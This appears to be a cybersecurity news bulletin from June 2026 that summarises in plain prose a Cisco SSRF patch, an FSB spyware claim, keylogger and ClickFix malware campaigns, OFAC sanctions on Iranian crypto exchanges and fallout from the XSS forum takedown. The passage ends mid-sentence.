ThreatsDay Bulletin: AI Agents Gone Wrong, Sketchy C2 Tools, ClickFix Tricks, JS Backdoors & 20+ New Stories

Summary

This threat intelligence bulletin aggregates multiple security stories including a high-severity Cisco Unified Communications Manager SSRF vulnerability (CVE-2026-20230), Russian FSB disclosure of foreign intelligence spyware targeting officials, social engineering campaigns distributing VIP Keylogger via JavaScript and script loaders, and U.S. Treasury sanctions against Iran's Nobitex crypto exchange for facilitating terrorist payments and ransomware funding. The article frames a broader trend of escalating threat sophistication and persistent security infrastructure failures.

Full text

ThreatsDay Bulletin: AI Agents Gone Wrong, Sketchy C2 Tools, ClickFix Tricks, JS Backdoors & 20+ New Stories Ravie LakshmananJun 04, 2026Hacking News / Cybersecurity News It got stupid again. The internet still feels held together with tape. Bad plugins, old bugs, fake tools, trusted apps doing shady things. Same mess, new wrapper. And now the weird stuff is normal. Forums go down and come back worse. Cheap hackers get better toys. AI starts breaking real systems. Great. Read the whole thing before it ruins your week anyway. Unauthenticated SSRF risk Cisco Patches Unified Communications Manager Flaw Cisco has released fixes to address a high-severity security flaw in Unified Communications Manager (CVE-2026-20230, CVSS score: 8.6) that could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. "This vulnerability is due to improper input validation for specific HTTP requests," Cisco said. "An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root." The issue has been addressed in Cisco Unified CM and Unified CM SME Release versions 14SU6 and 15SU5. Cisco said it's aware of the availability of proof-of-concept exploit code for the flaw, but noted there is no evidence of active exploitation. It credited an independent security researcher working with SSD Secure Disclosure for reporting the vulnerability. Mobile spyware operation Russia Claims Large-Scale Operation Targeting High-Ranking Officials Russia's Federal Security Service (FSB) has disclosed details of what it described as a "large-scale action" undertaken by foreign intelligence services to stealthily implant spyware on the mobile devices of high-ranking officials in the country. "This software was utilized to exfiltrate existing data, intercept ongoing conversations, and conduct covert audio and video surveillance of the immediate surroundings of the electronic devices, with the ultimate objective of obtaining sensitive information," the FSB said. Russia did not reveal who was behind the attacks, but noted the "representatives of foreign intelligence services" leveraged the technical capabilities of major international IT corporations to exfiltrate sensitive data from the devices. This specifically included the exploitation of mobile communication channels, the agency added. An investigation into the activity is ongoing, with the FSB also initiating a criminal case to investigate the matter. Layered keylogger lures VIP Keylogger Campaigns Analyzed Threat actors have been relying on social engineering over the past few months to push VIP Keylogger via loaders written in JavaScript, batch scripts, and Visual Basic Script (VBS). "Attackers are masquerading as legitimate business communications such as bank payment notifications, procurement orders, and logistics updates to lure users into opening malicious files," Splunk said. Crypto sanctions escalation U.S. Sanctions Nobitex Crypto Exchange The U.S. Treasury's Office of Foreign Assets Control (OFAC) has announced sanctions against Nobitex, Iran's largest cryptocurrency exchange, for facilitating payments related to terrorist activities. "Nobitex has provided significant support to the regime, processing more than 50 percent of all Iranian digital asset inflows in 2025 and facilitating payments tied to Iran's terrorist activities, sanctions evasion efforts, and Islamic Revolutionary Guard Corps (IRGC)-linked transactions, including activity associated with IRGC-affiliated ransomware actors," the Treasury said. The sanctions also extend to Nobitex's chairman, co-founder, and former CEO, Amir Hossein Rad, as well as other Nobitex leaders and officials, and three other exchanges: Wallex, Bitpin, and Ramzinex. According to Chainalysis, Nobitex processed over 50% of all Iranian digital asset inflows last year. The four exchanges accounted for roughly $7.7 billion, 78% of Iran's USD 9.9 billion in attributed 2025 crypto volume, per TRM Labs. Cybercrime forum fallout XSS Takes Fractures Cybercrime Underground The July 2025 law enforcement takedown of XSS, a prominent Russian-speaking cybercrime forum, didn't dismantle the ecosystem. Rather, it fractured it into competing, harder-to-track factions, Flashpoint said. The collapse has triggered an exodus into new, unvetted, and often adversarial communities. Some of the new forums that have rushed to fill up the void left by XSS include DamageLib (launched by legacy moderators of XSS), Rehub (launched by another former XSS moderator), XSS.pro (a resurrection using old backups and suspected to be a law-enforcement honeypot), and XSSF (started by a pro-Russian Telegram hacking group). RMM abuse surge Malicious Use of Tiflux in Attacks Surges A lesser-known remote desktop tool called Tiflux is being used in a growing number of attacks to establish persistence, transmit screenshots, and run commands to collect system profiling information. "Threat actors behind the rogue Tiflux incidents also installed UltraVNC, an open-source remote access tool, sideloaded other commercial RMMs, including Splashtop and ScreenConnect, and installed an outdated driver that can permit the threat actor to elevate their own privileges on an infected system," Huntress said. "Threat actors continue to test and weaponize the use of commercial remote access management tools." Malware delivery network DriveSurge Linked to ClickFix and FakeUpdates Campaigns A threat cluster tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates (aka SocGholish) social engineering techniques on compromised sites. Thousands of websites are estimated to have been compromised, directing users to malicious infrastructure. DriveSurge primarily acts as an initial access broker (IAB) operating on a pay-per-install (PPI) model, enabling follow-on attacks. Visitors of compromised websites are steered through a traffic distribution system (TDS) known as zTDS, which profiles the system and decides whether the visitor should be served a ClickFix or a FakeUpdates lure. zTDS, in use since at least 2015, is publicly available at ztds[.]info. "Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites' owners or their visitors," Silent Push said. The campaign has been active since September 2025. Sensitive data leak Spain Arrests Suspect for Leaking Sensitive Data The Spanish National Police has arrested an unidentified individual for leaking sensitive information related to members of various critical state organizations, including the National Cybersecurity Institute (INCIBE), the State Attorney General's Office, the National Police, the Civil Guard, and the National Security Council. JavaScript backdoor malspam Malspam Distributes JavaScript Backdoor Intrinsec haș disclosed that multiple malspam campaigns have been used to distribute a JavaScript-coded backdoor. "The targets of those campaigns were from all regions and sectors, notably energy and finance ministries, including in the CIS region," the company said. "We believe the campaigns to be financially motivated and operated for email account compromise (EAC) and/or business email compromise (BEC)." The activity was observed in March 2026. On-chain malware delivery ClearFake Campaign Leverages EtherHiding Cybersecurity researchers have flagged an intrusion in which threat actors used the EtherHiding technique to route ClearFake payload delivery through smart contracts on the BNB Smart Chain testnet. "The attack chain ended with two simultaneously deployed stealers, SectopRAT and ACRStealer, alongside an on-chain execution tracker that confirmed each victim compromise in real time," Trend Micro said. Cloud atta

Indicators of Compromise

• cve — CVE-2026-20230
• malware — VIP Keylogger

Entities